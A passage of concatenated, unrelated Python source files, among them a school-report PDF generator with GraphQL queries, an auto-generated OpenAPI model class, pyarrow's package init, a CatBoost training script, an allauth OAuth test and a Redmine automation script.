pdf.rotation(angle=ANGLE): with pdf.edit().text_xs() as e: pdf.cell( w=0, h=e.line_height, txt="Bonne", align="L", ln=1, ) # pdf.set_y(pdf.get_y() + 5) # pdf.set_x(10) def output_competency(pdf, competency_id, data, output_domain, output_sub_domain): competency = data["competency_by_id"][competency_id] write_needed = False observations = data["observations_by_competency_id"][competency_id] len_observations = len(observations) if len_observations > 0: write_needed = True evaluations = data["evaluations_by_competency_id"][competency_id] len_evaluations = len(evaluations) comment = None if len_evaluations > 0: evaluation = evaluations[0] if evaluation["comment"]: comment = evaluation["comment"] write_needed = True if not write_needed: return output_domain() output_sub_domain() output_competency_table(pdf, competency_id, data) if len_observations > 0: with pdf.edit().text_sm().text_gray_700().font_mono() as e: e.empty_line() if len_observations > 1: e.write(f"{len_observations} observations", indent=1) else: e.write("1 observation", indent=1) e.empty_line() if comment: with pdf.edit().style_normal() as e: if len_observations == 0: e.empty_line() e.write(comment, indent=1) e.empty_line() class PDF(FPDF, HTMLMixin): def __init__(self, total_pages=True, *args, **kwargs): super().__init__(*args, **kwargs) self.total_pages = total_pages self.add_font("dejavu", fname=CURRENT_DIR / "DejaVuSerif.ttf", uni=True) self.add_font( "dejavu-bold", fname=CURRENT_DIR / "DejaVuSerif-Bold.ttf", uni=True ) self.add_font("dejavu-mono", fname=CURRENT_DIR / "DejaVuSansMono.ttf", uni=True) self.black_and_white = True def footer(self): # Position at 1.5 cm from bottom self.set_y(-15) # helvetica italic 8 self.set_font("helvetica", "I", 8) # Page number if self.total_pages: self.cell(0, 10, "Page " + str(self.page_no()) + "/{nb}", 0, 0, "C") else: self.cell(0, 10, "Page " + str(self.page_no()), 0, 0, "C") def edit(self): return PdfWriter(self) class PdfWriter(object): def __init__(self, pdf): self.pdf = pdf self.line_height = 10 self.font_normal() self.text_base() self.text_black() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): pass def write(self, txt, indent=0, align="L"): # 10 is the default left margin self.pdf.set_x(10 + indent * 10) self.pdf.multi_cell(w=0, h=self.line_height, txt=txt, ln=1, align=align) def write_with_marker(self, txt): self.pdf.rect( self.pdf.get_x(), self.pdf.get_y() + self.line_height / 4, 10, self.line_height / 2, "F", ) self.pdf.set_x(self.pdf.get_x() + 20) self.pdf.cell(w=0, h=self.line_height, txt=txt, ln=1) def empty_line(self): self.pdf.cell(w=0, h=self.line_height, txt="", ln=1) def rect(self, x, y, w, h): self.pdf.rect(x, y, w, h, "F") def borders(self, x, y, w, h): self.pdf.rect(x, y, w, h, "D") def style_label(self): return self.font_normal().text_sm().text_gray_700() def style_normal(self): return self.font_normal().text_base().text_black() def font_normal(self): self.pdf.set_font("dejavu") return self def font_bold(self): self.pdf.set_font("dejavu-bold") return self def font_mono(self): self.pdf.set_font("dejavu-mono") return self def text_lg(self): self.pdf.set_font_size(14) self.line_height = 10 return self def text_xl(self): self.pdf.set_font_size(12) self.line_height = 8 return self def text_base(self): self.pdf.set_font_size(10) self.line_height = 6 return self def text_sm(self): self.pdf.set_font_size(8) self.line_height = 4 return self def text_xs(self): self.pdf.set_font_size(6) self.line_height = 2 return self def text_xxs(self): self.pdf.set_font_size(5) self.line_height = 1 return self def text_gray_700(self): self.pdf.set_text_color(0x37, 0x41, 0x51) return self def text_black(self): self.pdf.set_text_color(0x11, 0x18, 0x27) return self def text_red_600(self): self.pdf.set_text_color(0xDC, 0x26, 0x26) return self def text_yellow_600(self): self.pdf.set_text_color(0xD9, 0x77, 0x06) return self def text_green_600(self): self.pdf.set_text_color(0x05, 0x96, 0x69) return self def text_blue_600(self): self.pdf.set_text_color(0x25, 0x63, 0xEB) return self def text_pink_600(self): self.pdf.set_text_color(0xDB, 0x27, 0x77) return self def draw_gray_900(self): self.pdf.set_draw_color(0x11, 0x18, 0x27) return self def fill_white(self): self.pdf.set_fill_color(0xFF, 0xFF, 0xFF) return self def fill_gray_50(self): self.pdf.set_fill_color(0xF9, 0xFA, 0xFB) return self def fill_gray_100(self): self.pdf.set_fill_color(0xF3, 0xF4, 0xF6) return self def fill_gray_200(self): self.pdf.set_fill_color(0xE5, 0xE7, 0xEB) return self def fill_gray_300(self): self.pdf.set_fill_color(0xD1, 0xD5, 0xDB) return self def fill_gray_400(self): self.pdf.set_fill_color(0x9C, 0xA3, 0xAF) return self def fill_gray_500(self): self.pdf.set_fill_color(0x6B, 0x72, 0x80) return self def fill_gray_600(self): self.pdf.set_fill_color(0x4B, 0x55, 0x63) return self def fill_gray_700(self): self.pdf.set_fill_color(0x37, 0x41, 0x51) return self def fill_gray_800(self): self.pdf.set_fill_color(0x1F, 0x29, 0x37) return self def fill_gray_900(self): self.pdf.set_fill_color(0x11, 0x18, 0x27) return self def fill_black(self): self.pdf.set_fill_color(0x11, 0x18, 0x27) return self def fill_red_600(self): if self.pdf.black_and_white: return self.fill_gray_600() self.pdf.set_fill_color(0xDC, 0x26, 0x26) return self def fill_yellow_600(self): if self.pdf.black_and_white: return self.fill_gray_500() self.pdf.set_fill_color(0xD9, 0x77, 0x06) return self def fill_green_600(self): if self.pdf.black_and_white: return self.fill_gray_400() self.pdf.set_fill_color(0x05, 0x96, 0x69) return self def fill_blue_600(self): self.pdf.set_fill_color(0x25, 0x63, 0xEB) return self def fill_pink_600(self): if self.pdf.black_and_white: return self.fill_gray_300() self.pdf.set_fill_color(0xDB, 0x27, 0x77) return self async def gql_period(gql_client, period_id, student_id): r = await gql_client.run_query( """ query Period($student_id: bigint!, $period_id: Int!) { period: eval_period_by_pk(id: $period_id) { active end group_id group { name } id name start students(where: {student_id: {_eq: $student_id}}) { cycle student { id active birthdate firstname group_id lastname school_entry school_exit } } } } """, {"student_id": student_id, "period_id": period_id}, ) period = r["data"]["period"] relation = period["students"][0] cycle = relation["cycle"] student = relation["student"] student["cycle"] = cycle return (period, student) async def gql_report( gql_client, student_id, period_id, x_hasura_user_id, x_hasura_user_group ): # Check permissions and gather first info group_id = (await gql_client.user_by_id(x_hasura_user_id))["group_id"] if group_id != x_hasura_user_group: raise HTTPException(500) period, student = await gql_period(gql_client, period_id, student_id) if group_id != period["group_id"]: raise HTTPException(500) if group_id != student["group_id"]: raise HTTPException(500) if not period["active"]: raise HTTPException(500) if not student["active"]: raise HTTPException(500) r = await gql_client.run_query( """ query Report( $student_id: bigint!, $cycle: cycle!, $period_end: date!, $group_id: bigint!, ) { evaluations: eval_evaluation( where: { active: {_eq: true} student_id: {_eq: $student_id} competency: {cycle: {_eq: $cycle}, active: {_eq: true}} date: {_lte: $period_end} } order_by: {date: desc} ) { id created_at updated_at date competency_id status user_id comment } observations: eval_observation( where: { active: {_eq: true} competencies: {competency: {cycle: {_eq: $cycle}, active: {_eq: true}}} complete: {complete: {_eq: true}} date: {_lte: $period_end} students: {student_id: {_eq: $student_id}} }, order_by: {date: desc} ) { id created_at updated_at date competencies(where: {competency: {active: {_eq: true}}}) { competency_id } text user_id } comments: eval_comment( where: { active: {_eq: true}, student_id: {_eq: $student_id}, date: {_lte: $period_end} } order_by: {updated_at: desc}, ) { id date created_at updated_at text user_id } socle: socle_container( where: { cycle: { _eq: $cycle } container_id: { _is_null: true } active: { _eq: true } group_id: { _eq: $group_id } } order_by: { alpha_full_rank: asc } ) { id children( where: { active: { _eq: true } group_id: { _eq: $group_id } } order_by: { alpha_full_rank: asc } ) { id competencies( where: { active: { _eq: true } group_id: { _eq: $group_id } } order_by: { alpha_full_rank: asc } ) { id } } competencies( where: { active: { _eq: true } group_id: { _eq: $group_id } } order_by: { alpha_full_rank: asc } ) { id } } competencies: socle_competency( where: { active: { _eq: true } group_id: { _eq: $group_id } } ) { container_id cycle full_rank id rank text } containers: socle_container( where: { active: { _eq: true } group_id: { _eq: $group_id } } ) { id container_id full_rank cycle rank text } } """, { "period_end": period["end"], "student_id": student_id, "cycle": student["cycle"], "group_id": group_id, }, ) data = r["data"] data["period"] = period data["student"] = student data["container_by_id"] = { container["id"]: container for container in data["containers"] } data["competency_by_id"] = { competency["id"]: competency for competency in data["competencies"] } if data["comments"]: data["comment"] = data["comments"][0] else: data["comment"] = None data["observations_by_competency_id"] = defaultdict(list) for observation in data["observations"]: for competency in observation["competencies"]: data["observations_by_competency_id"][competency["competency_id"]].append( observation ) data["evaluations_by_competency_id"] = defaultdict(list) for evaluation in data["evaluations"]: data["evaluations_by_competency_id"][evaluation["competency_id"]].append( evaluation ) # Compute competencies -> domain domains = {} # domain -> nb competencies total = defaultdict(int) for l1 in data["socle"]: for l2 in l1["children"]: for c in l2["competencies"]: domains[c["id"]] = l1["id"] total[l1["id"]] += 1 for c in l1["competencies"]: domains[c["id"]] = l1["id"] total[l1["id"]] += 1 # Now sort evaluations count by domain and status evaluations = { l1["id"]: { "NotAcquired": 0, "InProgress": 0, "Acquired": 0, "TipTop": 0, } for l1 in data["socle"] } for evaluation in data["evaluations"]: domain = domains[evaluation["competency_id"]] status = evaluation["status"] evaluations[domain][status] += 1 # Now move non evaluated to "InProgress" for l1_id in evaluations: evaluations[l1_id]["InProgress"] += total[l1_id] - ( evaluations[l1_id]["NotAcquired"] + evaluations[l1_id]["InProgress"] + evaluations[l1_id]["Acquired"] + evaluations[l1_id]["TipTop"] ) data["evaluations_count_by_domain_status"] = evaluations data["evaluations_count_by_domain"] = total # Grand total not_acquired = 0 in_progress = 0 acquired = 0 tip_top = 0 for l1_id in evaluations: not_acquired += evaluations[l1_id]["NotAcquired"] in_progress += evaluations[l1_id]["InProgress"] acquired += evaluations[l1_id]["Acquired"] tip_top += evaluations[l1_id]["TipTop"] data["evaluations_count_by_status"] = { "not_acquired": not_acquired, "in_progress": in_progress, "acquired": acquired, "tip_top": tip_top, "total": not_acquired + in_progress + acquired + tip_top, } return data def make_safe_filename(s): def safe_char(c): if c.isalnum() or c == ".": return c else: return "_" fname = "".join(safe_char(c) for c in s).rstrip("_") fname = re.sub("_{2,}", "_", fname) return fname async def inactivate_old_report(gql_client, student_id, period_id): r = await gql_client.run_query( """ mutation Inactivate($student_id: Int!, $period_id: Int!) { update_report( where: { student_id: {_eq: $student_id}, period: {eval_period_id: {_eq: $period_id}} } _set: {active: false} ) { affected_rows } }""", {"student_id": student_id, "period_id": period_id}, ) return r["data"]["update_report"]["affected_rows"] async def insert_report(gql_client, student_id, cycle, date, json_path, pdf_path): r = await gql_client.run_query( """ mutation InsertReport($student_id: Int!, $cycle: cycle!, $date: date!, $json_path: String!, $pdf_path: String!) { insert_report_one( object: { active: true, cycle: $cycle, date: $date, json_path: $json_path, pdf_path: $pdf_path, student_id: $student_id } ) { id } } """, { "student_id": student_id, "cycle": cycle, "date": date, "json_path": json_path, "pdf_path": pdf_path, }, ) return r["data"]["insert_report_one"]["id"] async def dl_report( reports_dir, group_id: int, period_id: int, filename: str, token: str, hasura_graphql_jwt_secret, ): t = jwt.decode(token, hasura_graphql_jwt_secret, algorithms=["HS256"]) token_group_id = int(t["https://hasura.io/jwt/claims"]["x-hasura-user-group"]) if group_id != token_group_id: return None file_path = Path(reports_dir) / f"{group_id}" / f"{period_id}" / filename return FileResponse(file_path, media_type="application/pdf") async def dl_zip_reports( gql_client, reports_dir, group_id: int, period_id: int, token: str, hasura_graphql_jwt_secret, ): t = jwt.decode(token, hasura_graphql_jwt_secret, algorithms=["HS256"]) token_group_id = int(t["https://hasura.io/jwt/claims"]["x-hasura-user-group"]) if group_id != token_group_id: return None dir_path = Path(reports_dir) / f"{group_id}" / f"{period_id}" group = await gql_client.group_by_id(group_id) period = await gql_client.period_by_id(period_id) zip_fname = make_safe_filename(f"{group['name']}_{period['name']}.zip") virtual_path = Path(make_safe_filename(f"{group['name']}_{period['name']}")) zip_path = dir_path / zip_fname with ZipFile(zip_path, "w") as myzip: for pdf in dir_path.listdir("*.pdf"): myzip.write(pdf, arcname=virtual_path / pdf.basename()) return FileResponse(zip_path, media_type="application/zip", filename=zip_fname) # coding: utf-8 """ PowerMeter API API # noqa: E501 The version of the OpenAPI document: 2021.4.1 Generated by: https://openapi-generator.tech """ import pprint import re # noqa: F401 import six from powermeter_api.configuration import Configuration class DesignPin(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'id': 'int', 'name': 'str', 'direction': 'str', 'type': 'str', 'bus': 'str', 'bus_index': 'int', 'bundle': 'str', 'bundle_index': 'int', 'pin_caps': 'list[PinCap]', 'power_count': 'int', 'function': 'str', 'internal_node': 'str' } attribute_map = { 'id': 'id', 'name': 'name', 'direction': 'direction', 'type': 'type', 'bus': 'bus', 'bus_index': 'bus_index', 'bundle': 'bundle', 'bundle_index': 'bundle_index', 'pin_caps': 'pin_caps', 'power_count': 'power_count', 'function': 'function', 'internal_node': 'internal_node' } def __init__(self, id=None, name=None, direction=None, type=None, bus=None, bus_index=None, bundle=None, bundle_index=None, pin_caps=None, power_count=None, function=None, internal_node=None, local_vars_configuration=None): # noqa: E501 """DesignPin - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration() self.local_vars_configuration = local_vars_configuration self._id = None self._name = None self._direction = None self._type = None self._bus = None self._bus_index = None self._bundle = None self._bundle_index = None self._pin_caps = None self._power_count = None self._function = None self._internal_node = None self.discriminator = None if id is not None: self.id = id self.name = name self.direction = direction self.type = type self.bus = bus self.bus_index = bus_index self.bundle = bundle self.bundle_index = bundle_index if pin_caps is not None: self.pin_caps = pin_caps if power_count is not None: self.power_count = power_count self.function = function self.internal_node = internal_node @property def id(self): """Gets the id of this DesignPin. # noqa: E501 :return: The id of this DesignPin. # noqa: E501 :rtype: int """ return self._id @id.setter def id(self, id): """Sets the id of this DesignPin. :param id: The id of this DesignPin. # noqa: E501 :type: int """ self._id = id @property def name(self): """Gets the name of this DesignPin. # noqa: E501 :return: The name of this DesignPin. # noqa: E501 :rtype: str """ return self._name @name.setter def name(self, name): """Sets the name of this DesignPin. :param name: The name of this DesignPin. # noqa: E501 :type: str """ if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501 raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501 if (self.local_vars_configuration.client_side_validation and name is not None and len(name) < 1): raise ValueError("Invalid value for `name`, length must be greater than or equal to `1`") # noqa: E501 self._name = name @property def direction(self): """Gets the direction of this DesignPin. # noqa: E501 :return: The direction of this DesignPin. # noqa: E501 :rtype: str """ return self._direction @direction.setter def direction(self, direction): """Sets the direction of this DesignPin. :param direction: The direction of this DesignPin. # noqa: E501 :type: str """ if self.local_vars_configuration.client_side_validation and direction is None: # noqa: E501 raise ValueError("Invalid value for `direction`, must not be `None`") # noqa: E501 allowed_values = ["input", "output", "inout", "internal"] # noqa: E501 if self.local_vars_configuration.client_side_validation and direction not in allowed_values: # noqa: E501 raise ValueError( "Invalid value for `direction` ({0}), must be one of {1}" # noqa: E501 .format(direction, allowed_values) ) self._direction = direction @property def type(self): """Gets the type of this DesignPin. # noqa: E501 :return: The type of this DesignPin. # noqa: E501 :rtype: str """ return self._type @type.setter def type(self, type): """Sets the type of this DesignPin. :param type: The type of this DesignPin. # noqa: E501 :type: str """ if (self.local_vars_configuration.client_side_validation and type is not None and len(type) < 1): raise ValueError("Invalid value for `type`, length must be greater than or equal to `1`") # noqa: E501 self._type = type @property def bus(self): """Gets the bus of this DesignPin. # noqa: E501 :return: The bus of this DesignPin. # noqa: E501 :rtype: str """ return self._bus @bus.setter def bus(self, bus): """Sets the bus of this DesignPin. :param bus: The bus of this DesignPin. # noqa: E501 :type: str """ if (self.local_vars_configuration.client_side_validation and bus is not None and len(bus) < 1): raise ValueError("Invalid value for `bus`, length must be greater than or equal to `1`") # noqa: E501 self._bus = bus @property def bus_index(self): """Gets the bus_index of this DesignPin. # noqa: E501 :return: The bus_index of this DesignPin. # noqa: E501 :rtype: int """ return self._bus_index @bus_index.setter def bus_index(self, bus_index): """Sets the bus_index of this DesignPin. :param bus_index: The bus_index of this DesignPin. # noqa: E501 :type: int """ if (self.local_vars_configuration.client_side_validation and bus_index is not None and bus_index > 2147483647): # noqa: E501 raise ValueError("Invalid value for `bus_index`, must be a value less than or equal to `2147483647`") # noqa: E501 if (self.local_vars_configuration.client_side_validation and bus_index is not None and bus_index < -2147483648): # noqa: E501 raise ValueError("Invalid value for `bus_index`, must be a value greater than or equal to `-2147483648`") # noqa: E501 self._bus_index = bus_index @property def bundle(self): """Gets the bundle of this DesignPin. # noqa: E501 :return: The bundle of this DesignPin. # noqa: E501 :rtype: str """ return self._bundle @bundle.setter def bundle(self, bundle): """Sets the bundle of this DesignPin. :param bundle: The bundle of this DesignPin. # noqa: E501 :type: str """ if (self.local_vars_configuration.client_side_validation and bundle is not None and len(bundle) < 1): raise ValueError("Invalid value for `bundle`, length must be greater than or equal to `1`") # noqa: E501 self._bundle = bundle @property def bundle_index(self): """Gets the bundle_index of this DesignPin. # noqa: E501 :return: The bundle_index of this DesignPin. # noqa: E501 :rtype: int """ return self._bundle_index @bundle_index.setter def bundle_index(self, bundle_index): """Sets the bundle_index of this DesignPin. :param bundle_index: The bundle_index of this DesignPin. # noqa: E501 :type: int """ if (self.local_vars_configuration.client_side_validation and bundle_index is not None and bundle_index > 2147483647): # noqa: E501 raise ValueError("Invalid value for `bundle_index`, must be a value less than or equal to `2147483647`") # noqa: E501 if (self.local_vars_configuration.client_side_validation and bundle_index is not None and bundle_index < 0): # noqa: E501 raise ValueError("Invalid value for `bundle_index`, must be a value greater than or equal to `0`") # noqa: E501 self._bundle_index = bundle_index @property def pin_caps(self): """Gets the pin_caps of this DesignPin. # noqa: E501 :return: The pin_caps of this DesignPin. # noqa: E501 :rtype: list[PinCap] """ return self._pin_caps @pin_caps.setter def pin_caps(self, pin_caps): """Sets the pin_caps of this DesignPin. :param pin_caps: The pin_caps of this DesignPin. # noqa: E501 :type: list[PinCap] """ self._pin_caps = pin_caps @property def power_count(self): """Gets the power_count of this DesignPin. # noqa: E501 :return: The power_count of this DesignPin. # noqa: E501 :rtype: int """ return self._power_count @power_count.setter def power_count(self, power_count): """Sets the power_count of this DesignPin. :param power_count: The power_count of this DesignPin. # noqa: E501 :type: int """ self._power_count = power_count @property def function(self): """Gets the function of this DesignPin. # noqa: E501 :return: The function of this DesignPin. # noqa: E501 :rtype: str """ return self._function @function.setter def function(self, function): """Sets the function of this DesignPin. :param function: The function of this DesignPin. # noqa: E501 :type: str """ if (self.local_vars_configuration.client_side_validation and function is not None and len(function) < 1): raise ValueError("Invalid value for `function`, length must be greater than or equal to `1`") # noqa: E501 self._function = function @property def internal_node(self): """Gets the internal_node of this DesignPin. # noqa: E501 :return: The internal_node of this DesignPin. # noqa: E501 :rtype: str """ return self._internal_node @internal_node.setter def internal_node(self, internal_node): """Sets the internal_node of this DesignPin. :param internal_node: The internal_node of this DesignPin. # noqa: E501 :type: str """ if (self.local_vars_configuration.client_side_validation and internal_node is not None and len(internal_node) < 1): raise ValueError("Invalid value for `internal_node`, length must be greater than or equal to `1`") # noqa: E501 self._internal_node = internal_node def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, DesignPin): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, DesignPin): return True return self.to_dict() != other.to_dict() # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # flake8: noqa from pkg_resources import get_distribution, DistributionNotFound try: __version__ = get_distribution(__name__).version except DistributionNotFound: # package is not installed try: # This code is duplicated from setup.py to avoid a dependency on each # other. def parse_version(root): from setuptools_scm import version_from_scm import setuptools_scm.git describe = (setuptools_scm.git.DEFAULT_DESCRIBE + " --match 'apache-arrow-[0-9]*'") # Strip catchall from the commandline describe = describe.replace("--match *.*", "") version = setuptools_scm.git.parse(root, describe) if not version: return version_from_scm(root) else: return version import setuptools_scm __version__ = setuptools_scm.get_version('../', parse=parse_version) except (ImportError, LookupError): __version__ = None from pyarrow.lib import cpu_count, set_cpu_count from pyarrow.lib import (null, bool_, int8, int16, int32, int64, uint8, uint16, uint32, uint64, time32, time64, timestamp, date32, date64, float16, float32, float64, binary, string, decimal128, list_, struct, union, dictionary, field, type_for_alias, DataType, Field, Schema, schema, Array, Tensor, array, chunked_array, column, from_numpy_dtype, NullArray, NumericArray, IntegerArray, FloatingPointArray, BooleanArray, Int8Array, UInt8Array, Int16Array, UInt16Array, Int32Array, UInt32Array, Int64Array, UInt64Array, ListArray, UnionArray, BinaryArray, StringArray, FixedSizeBinaryArray, DictionaryArray, Date32Array, Date64Array, TimestampArray, Time32Array, Time64Array, Decimal128Array, StructArray, ArrayValue, Scalar, NA, BooleanValue, Int8Value, Int16Value, Int32Value, Int64Value, UInt8Value, UInt16Value, UInt32Value, UInt64Value, HalfFloatValue, FloatValue, DoubleValue, ListValue, BinaryValue, StringValue, FixedSizeBinaryValue, DecimalValue, Date32Value, Date64Value, TimestampValue) # Buffers, allocation from pyarrow.lib import (Buffer, ResizableBuffer, foreign_buffer, py_buffer, compress, decompress, allocate_buffer) from pyarrow.lib import (MemoryPool, total_allocated_bytes, set_memory_pool, default_memory_pool, log_memory_allocations) from pyarrow.lib import (HdfsFile, NativeFile, PythonFile, FixedSizeBufferWriter, BufferReader, BufferOutputStream, OSFile, MemoryMappedFile, memory_map, create_memory_map, have_libhdfs, have_libhdfs3, MockOutputStream) from pyarrow.lib import (ChunkedArray, Column, RecordBatch, Table, concat_tables) from pyarrow.lib import (ArrowException, ArrowKeyError, ArrowInvalid, ArrowIOError, ArrowMemoryError, ArrowNotImplementedError, ArrowTypeError, ArrowSerializationError, PlasmaObjectExists) # Serialization from pyarrow.lib import (deserialize_from, deserialize, deserialize_components, serialize, serialize_to, read_serialized, SerializedPyObject, SerializationContext, SerializationCallbackError, DeserializationCallbackError) from pyarrow.filesystem import FileSystem, LocalFileSystem from pyarrow.hdfs import HadoopFileSystem import pyarrow.hdfs as hdfs from pyarrow.ipc import (Message, MessageReader, RecordBatchFileReader, RecordBatchFileWriter, RecordBatchStreamReader, RecordBatchStreamWriter, read_message, read_record_batch, read_schema, read_tensor, write_tensor, get_record_batch_size, get_tensor_size, open_stream, open_file, serialize_pandas, deserialize_pandas) localfs = LocalFileSystem.get_instance() from pyarrow.serialization import (default_serialization_context, register_default_serialization_handlers, register_torch_serialization_handlers) import pyarrow.types as types # Entry point for starting the plasma store def _plasma_store_entry_point(): """Entry point for starting the plasma store. This can be used by invoking e.g. ``plasma_store -s /tmp/plasma -m 1000000000`` from the command line and will start the plasma_store executable with the given arguments. """ import os import pyarrow import sys plasma_store_executable = os.path.join(pyarrow.__path__[0], "plasma_store") os.execv(plasma_store_executable, sys.argv) # ---------------------------------------------------------------------- # Deprecations from pyarrow.util import _deprecate_api # noqa frombuffer = _deprecate_api('frombuffer', 'py_buffer', py_buffer, '0.9.0') # ---------------------------------------------------------------------- # Returning absolute path to the pyarrow include directory (if bundled, e.g. in # wheels) def get_include(): """ Return absolute path to directory containing Arrow C++ include headers. Similar to numpy.get_include """ import os return os.path.join(os.path.dirname(__file__), 'include') def get_libraries(): """ Return list of library names to include in the `libraries` argument for C or Cython extensions using pyarrow """ return ['arrow_python'] def get_library_dirs(): """ Return lists of directories likely to contain Arrow C++ libraries for linking C or Cython extensions using pyarrow """ import os import sys package_cwd = os.path.dirname(__file__) library_dirs = [package_cwd] if sys.platform == 'win32': # TODO(wesm): Is this necessary, or does setuptools within a conda # installation add Library\lib to the linker path for MSVC? site_packages, _ = os.path.split(package_cwd) python_base_install, _ = os.path.split(site_packages) library_dirs.append(os.path.join(python_base_install, 'Library', 'lib')) return library_dirs """ Web APIリクエストルートマッパーモジュール """ from bpmappers import Mapper, DelegateField from .body.body import RunSimRequestBodyMapper from .header.header import RequestHeaderMapper class RunSimulationInputMapper(Mapper): """ シミュレーション実行リクエストマッパーオブジェクト """ head = DelegateField(RequestHeaderMapper) body = DelegateField(RunSimRequestBodyMapper) class RunSimulationRequestMapper(Mapper): """ シミュレーション実行リクエストマッパー """ simulation_input = DelegateField(RunSimulationInputMapper) upura/nlp100v2020ch07/ans63.py import numpy as np from gensim.models import KeyedVectors def cosSim(v1, v2): return np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2)) model = KeyedVectors.load_word2vec_format('ch07/GoogleNews-vectors-negative300.bin', binary=True) result = model.most_similar(positive=['Spain', 'Athens'], negative=['Madrid']) for i in range(10): print("{}: {:.4f}".format(*result[i])) # -*- coding: utf-8 -*- __author__ = '' __email__ = '' __version__ = '0.1.0'2020/day8/puzzle1.py import utils def main(): instructions = utils.read_input_file("code_instructions.txt") acc = 0 index = 0 visited = set() while index not in visited: visited.add(index) op, value = instructions[index].split(" ") print(f"Index: {index}\tOp: {op}\tValue: {value}") if op == "jmp": index += int(value.strip()) continue if op == "acc": acc += int(value.strip()) index += 1 if index in visited: print(f"Exiting early...") print(f"Acc = {acc}") if __name__ == "__main__": main() Tim232/Python-Things1-10 from sqlite3 import * conn = connect('C:/sqlite/Score.db') csr = conn.cursor() csr.execute("SELECT * FROM Score ORDER BY score DESC") result = csr.fetchall() for r in result: print(r) Machine-Learning-Builds/ML-python-catboost-trainingapp.py # coding=utf-8 import json import os import numpy as np from catboost import CatBoostClassifier, Pool, cv from sklearn.model_selection import train_test_split from catboost.datasets import titanic # get training data train, test = titanic() # remove nans train, test = train.fillna(-999), test.fillna(-999) # split into train and test X, y = train.drop(['PassengerId', 'Survived'], axis=1), train['Survived'] X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8) # define categorical features cat_indices = np.where(X_train.dtypes != float)[0] # define model params params = {'iterations': 1000, 'depth': 2, 'loss_function': 'Logloss', 'eval_metric': 'F1', 'use_best_model': True, 'verbose': True} # define and train model model = CatBoostClassifier(**params) model.fit(X_train, y_train, cat_features=cat_indices, eval_set=(X_test, y_test)) # evaluate the quality of the model with 10-fold cross validation cv_data = Pool(data=X, label=y, cat_features=cat_indices) scores = cv(cv_data, model.get_params(), fold_count=10) # print f1 metric f1_metric = np.max(scores['test-F1-mean']) print(f"f1 score: {round(f1_metric, 3)}") # persist model model.save_model('model') # write metrics if not os.path.exists('metrics'): os.mkdir('metrics') with open('metrics/f1.metric', 'w+') as f: json.dump(f1_metric, f) # -*- coding: utf-8 -*- from __future__ import absolute_import, unicode_literals from requests.exceptions import HTTPError from django.test.client import RequestFactory from django.test.utils import override_settings from django.urls import reverse from allauth.socialaccount.models import SocialToken from allauth.socialaccount.tests import OAuth2TestsMixin from allauth.tests import MockedResponse, TestCase, patch from .provider import YNABProvider @override_settings( SOCIALACCOUNT_AUTO_SIGNUP=True, ACCOUNT_SIGNUP_FORM_CLASS=None, ) # ACCOUNT_EMAIL_VERIFICATION=account_settings # .EmailVerificationMethod.MANDATORY) class YNABTests(OAuth2TestsMixin, TestCase): provider_id = YNABProvider.id def get_mocked_response(self): return MockedResponse( 200, """ {"data": { "user":{ "id": "" } } } """, ) def test_ynab_compelete_login_401(self): from allauth.socialaccount.providers.ynab_provider.views import ( YNABOAuth2Adapter, ) class LessMockedResponse(MockedResponse): def raise_for_status(self): if self.status_code != 200: raise HTTPError(None) request = RequestFactory().get( reverse(self.provider.id + "_login"), dict(process="login") ) adapter = YNABOAuth2Adapter(request) app = adapter.get_provider().get_app(request) token = SocialToken(token="some_token") response_with_401 = LessMockedResponse( 401, """ {"error": { "errors": [{ "domain": "global", "reason": "authError", "message": "Invalid Credentials", "locationType": "header", "location": "Authorization" } ], "code": 401, "message": "Invalid Credentials" } }""", ) with patch( "allauth.socialaccount.providers.ynab_provider.views" ".requests" ) as patched_requests: patched_requests.get.return_value = response_with_401 with self.assertRaises(HTTPError): adapter.complete_login(request, app, token) forestdussault/OLCRedmineAutomator import os import glob import click import ftplib import pickle import shutil import socket import sentry_sdk from amrsummary import before_send from automator_settings import SENTRY_DSN from nastools.nastools import retrieve_nas_files from automator_settings import FTP_USERNAME, FTP_PASSWORD @click.command() @click.option('--redmine_instance', help='Path to pickled Redmine API instance') @click.option('--issue', help='Path to pickled Redmine issue') @click.option('--work_dir', help='Path to Redmine issue work directory') @click.option('--description', help='Path to pickled Redmine description') def externalretrieve_redmine(redmine_instance, issue, work_dir, description): sentry_sdk.init(SENTRY_DSN, before_send=before_send) print('External retrieving!') # Unpickle Redmine objects redmine_instance = pickle.load(open(redmine_instance, 'rb')) issue = pickle.load(open(issue, 'rb')) description = pickle.load(open(description, 'rb')) try: os.makedirs(os.path.join(work_dir, str(issue.id))) # Parse description to figure out what SEQIDs we need to run on. fasta_list = list() fastq_list = list() fasta = False fastq = True for item in description: item = item.upper() if 'FASTA' in item: fasta = True fastq = False continue if 'FASTQ' in item: fastq = True fasta = False continue 